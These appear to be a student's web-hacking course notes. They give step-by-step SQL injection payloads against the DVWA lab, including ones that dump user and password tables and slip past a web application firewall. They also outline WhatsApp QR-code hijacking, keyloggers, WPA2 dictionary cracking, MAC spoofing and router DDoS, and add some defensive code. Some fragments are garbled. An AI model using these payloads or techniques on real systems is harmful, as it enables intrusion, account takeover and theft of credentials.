Day 2

Web Application Hacking and Security
Website: A collection of pages is known as a website.

Types of Websites

Static : A website has no database behind it, so users can see the content
of the website but cannot input anything from the user's side.

For Example: Pure HTML Site.

Dynamic : These websites carry a database within, so they have many user
interaction areas where the user enters information/data, which is then saved in
the backend.

For Example: Facebook, Google, Twitter, UMS etc.

OWASP TOP 10 Attacks

O : Open
W : Web
A : Application
S : Security
P : Project

SQL Injection
SQL : Structured Query Language

DDL : Data Definition Language

DML : Data Manipulation Lang.

DCL : Data Control Lang.

Attack 1: Authentication Bypass Attack

When a hacker tries to bypass the login panel of the website and gain access to the
admin panel with all features, through which he/she can manipulate the website.

Target :

userid=osama admin
password=bomb admin

select * from userstable where userid='osama' or '1'='1' and password='bomb' or '1'='1'
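
The query above next to its parameterized form, as an added example that is not part of the original notes. It uses Python's sqlite3 with an in-memory userstable; the stored row, the function names and the plain-text password column are assumptions made for the demonstration.

```python
import sqlite3


def make_db():
    # Constructed lab data. The plain-text password column only mirrors the
    # query in the notes; a real table stores salted password hashes.
    db = sqlite3.connect(":memory:")
    db.execute("create table userstable (userid text, password text)")
    db.execute("insert into userstable values ('admin', 'constructed-pass')")
    return db


def login_vulnerable(db, userid, password):
    # Input is pasted into the SQL text, so a quote in it rewrites the query.
    query = ("select * from userstable where userid='" + userid +
             "' and password='" + password + "'")
    return db.execute(query).fetchone() is not None


def login_parameterized(db, userid, password):
    # Placeholders pass the values separately from the SQL text, so quotes
    # inside them are compared as data and never parsed as SQL.
    query = "select * from userstable where userid=? and password=?"
    return db.execute(query, (userid, password)).fetchone() is not None


def outcome(login, userid, password):
    """Run one login attempt on a fresh database and classify the result."""
    try:
        return "granted" if login(make_db(), userid, password) else "denied"
    except sqlite3.OperationalError:
        # A database error caused by a lone quote is the signal that input
        # reaches the SQL parser unescaped.
        return "sql error"


if __name__ == "__main__":
    attempts = [("osama' or '1'='1", "bomb' or '1'='1"),
                ("'", "x"),
                ("admin", "constructed-pass")]
    for userid, password in attempts:
        print(repr(userid),
              "| concatenated:", outcome(login_vulnerable, userid, password),
              "| parameterized:", outcome(login_parameterized, userid, password))
```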


Union Based Injection


D : Damn
V : Vulnerable
W : Web
A : Application

Download :

1. XAMPP Server (To make your computer as server)
X : Cross Platform
A : Apache
P : Perl

2. DVWA : Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn
vulnerable. Its main goals are to be an aid for security professionals to test
their skills and tools in a legal environment, help web developers better
understand the processes of securing web applications and aid teachers/students to
teach/learn web application security in a class room environment.

3. Copy and paste the downloaded files into the c:/xampp/htdocs folder


Step 1: Target

Step 2: Find any GET method in the URL of the website


Step 3: Check the exception handling
'&Submit=Submit#

Step 4: Total number of columns from the respective table where id is a column.
' order by 1--

Step 5: Dump the left 2 columns on the right hand side.
' union select 1,2--

Step 6: Get the database and version name
Database->Tables->Columns->Data
' union select

Step 7: Get all the tables of the website from the database.
Schema: the mother of the database.
Tables : information_schema.tables
Columns : information_schema.columns
' union select 1,table_name from information_schema.tables--+&Submit=Submit#

Target Table Found : users

Step 8 : Get the columns of the users table
' union select 1,column_name from information_schema.columns where table_name='users'--+&Submit=Submit#

Step 9 : Get the data from user and password columns
' union select user,password from users--+&Submit=Submit#

Bypassing Firewall aka Union Based Injection via Web Application Firewall

Step 1: Find GET method in the URL

Step 2: Check the exception handling
'

Step 3: Count the total number of columns
order by 3--+

Step 4: Dump the columns on the right hand side.
union select 1,2--+

Bypassing Technique 1: Upper Lower Case
union select
UnIoN sElEcT -> new payload UnIoN sElEcT 1,2--+

Bypassing Technique 2: Inline Comments

Executable inline comments

/*!UnIoN*/ /*!SeLeCt*/ /*!UnIoN*/ /*!SeLeCt*/ 1,2--+

Bypassing Technique 3: Version Based Inline Executable Comments
/*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2--+

1.00.00 : 10000
2.00.00 : 20000
5.00.00 : 50000

Step 5: Get the database
/*!50000UnIoN*/ /*!50000SeLeCt*/ 1,database()--+

Step 6: Get the tables of the database
/*!50000UnIoN*/ /*!50000SeLeCt*/ 1,/*!table_name*/ /*!from*/ /*!information_schema.tables*/--+

Target Table : users

Step 7: Get the columns
/*!50000UnIoN*/ /*!50000SeLeCt*/ 1,/*!50000GrOuP_cOnCaT(column_name)*/ /*!50000from*/ /*!50000information_schema.columns*/ /*!50000where*/ /*!50000table_name='users'*/--+

Step 8: Get the login and password /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,password from

1. Do not run the WAF with default security settings.
2. Keep up to date on new blacklisted parameters for the WAF.
3. Make sure you make custom changes in the WAF according to the attacks you are getting.
4. Never turn off the firewall in the expectation of a faster response in traffic.
5. Have good validation of received queries and inputs at the server level as well.
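
Recommendations 3 and 5 applied to the three bypass techniques in this section, as an added example that is not from the original notes or from any WAF product: the parameter is reduced to the form MySQL would parse before a signature is matched. The function names and the single union/select signature are assumptions, and signature matching stays a second layer behind parameterized queries.

```python
import re
from urllib.parse import unquote_plus

# MySQL executes the body of /*! ... */ and /*!NNNNN ... */ comments
# (NNNNN = minimum server version, 50000 meaning 5.00.00).
EXEC_COMMENT = re.compile(r"/\*!(?:\d{5,6})?(.*?)\*/", re.DOTALL)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b")

# Parameter values: the first three are the payloads quoted in these notes,
# the last two are constructed benign inputs.
SAMPLES = [
    "UnIoN sElEcT 1,2--+",
    "/*!UnIoN*/ /*!SeLeCt*/ 1,2--+",
    "/*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2--+",
    "student union selection committee",
    "1",
]


def normalize(raw_value):
    """Reduce a request parameter to the form the database would parse."""
    text = unquote_plus(raw_value)          # "+" and %xx back to characters
    text = EXEC_COMMENT.sub(r" \1 ", text)  # keep the executable body
    text = PLAIN_COMMENT.sub(" ", text)     # ordinary comments act as spaces
    return re.sub(r"\s+", " ", text.lower()).strip()


def looks_like_union_injection(raw_value):
    """Match the signature on the normalized value, not on the raw bytes."""
    return UNION_SELECT.search(normalize(raw_value)) is not None


def scan(values):
    """Return the values that still match after normalization."""
    return [v for v in values if looks_like_union_injection(v)]


if __name__ == "__main__":
    for value in scan(SAMPLES):
        print("blocked:", value, "->", normalize(value))
```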

Whatsapp Hacking Attack : QRLJACKING

Step 1: Download Kali Linux (2.99GB)
How to Install and Run : Watch:

Step 2: Run and fill the username and password

username: root
password: toor

Step 3: Download QRLjacking code from Github

Open Terminal: git clone

Step 4: Open QRLframework folder

Step 5: Give permissions to
chmod +x
Step 6: Run it in terminal ./
Step 7: Select Chat Application -> Whatsapp -> Select Port 1337

Step 4: To make this fake WhatsApp QR code LIVE on the internet.

Download a service AKA: ngrok

Facebook | Email Hacking Methods
Family Keylogger :

How to Secure your Email Accounts

1. Always use a pass phrase instead of a password.
2. Always use a robust password
Card no Expiry Date and CVV : Check


3. *&Ig3SimG&*
4. Activate 2-Step Verification in your Gmail.
5. Facebook: Backup codes
6. Always check your login activities from Gmail to see any unauthorised access.

Reverse Engineering | Cracking LIVE

Reverse Engineering

Engineering : The goal of eng. is to build something.

High Level : ENG : C C++ Java Python

Middle Level : Assembly : .obj

Low Level : Binary : .exe

1. OllyDBG
2. Perfect Keylogger
3. Windows Platform

Target :

Wifi Hacking
Wifi Hacking: Wifi stands for wireless fidelity. It works on protocol 802.11a
onwards. The goal is to provide wireless connectivity between hosts for data and
information transfer and establish a valid communication channel for the same.

Types of KEY Security Encryptions

1. WEP : 64bit
2. WPA : 128bit
3. WPA-2 PSK <--- Target 256 and above

Problem : You cannot brute force the key.

How to Crack then : Dictionary Based Attack

1. Kali Linux 1.8 version (old)
2. airmon-ng : This CLI-based application is used to put your wifi device into
monitoring mode and check if it is capable of proceeding with the attack.
3. airodump-ng : This application will help you to dump the air packets and
identify how many wifi access points are near you so that you can
select the target to test its security.
4. macchanger* : This helps you to spoof your wifi adapter's real identity with a fake
MAC address in case you want to do anonymous security testing.
5. aircrack-ng : This application will help you to crack the key which you
extracted during the wifi hacking process by matching it against the dictionary,
and if it is found it will show the key.

rahul -->!@#$% --> Mobile

Router:rahul->!@#$% <---- !@#$%---rahul

Network Attacks : Exploitation

Active Attack : This attack is mainly concerned with attacking the device
directly. Hence we get the IP of the device and then attack the IP directly; the
main goal of this attack is either to gain access to that device or, if that fails,
to take the host down.

Example: Router DDOS Attack, DHCP Starvation Attack with Yersinia and websploit
wifi jammer

*Requirement : websploit in Kali Linux

Step 1: Open terminal and type websploit

Step 2: To see the cli network attacks type show modules

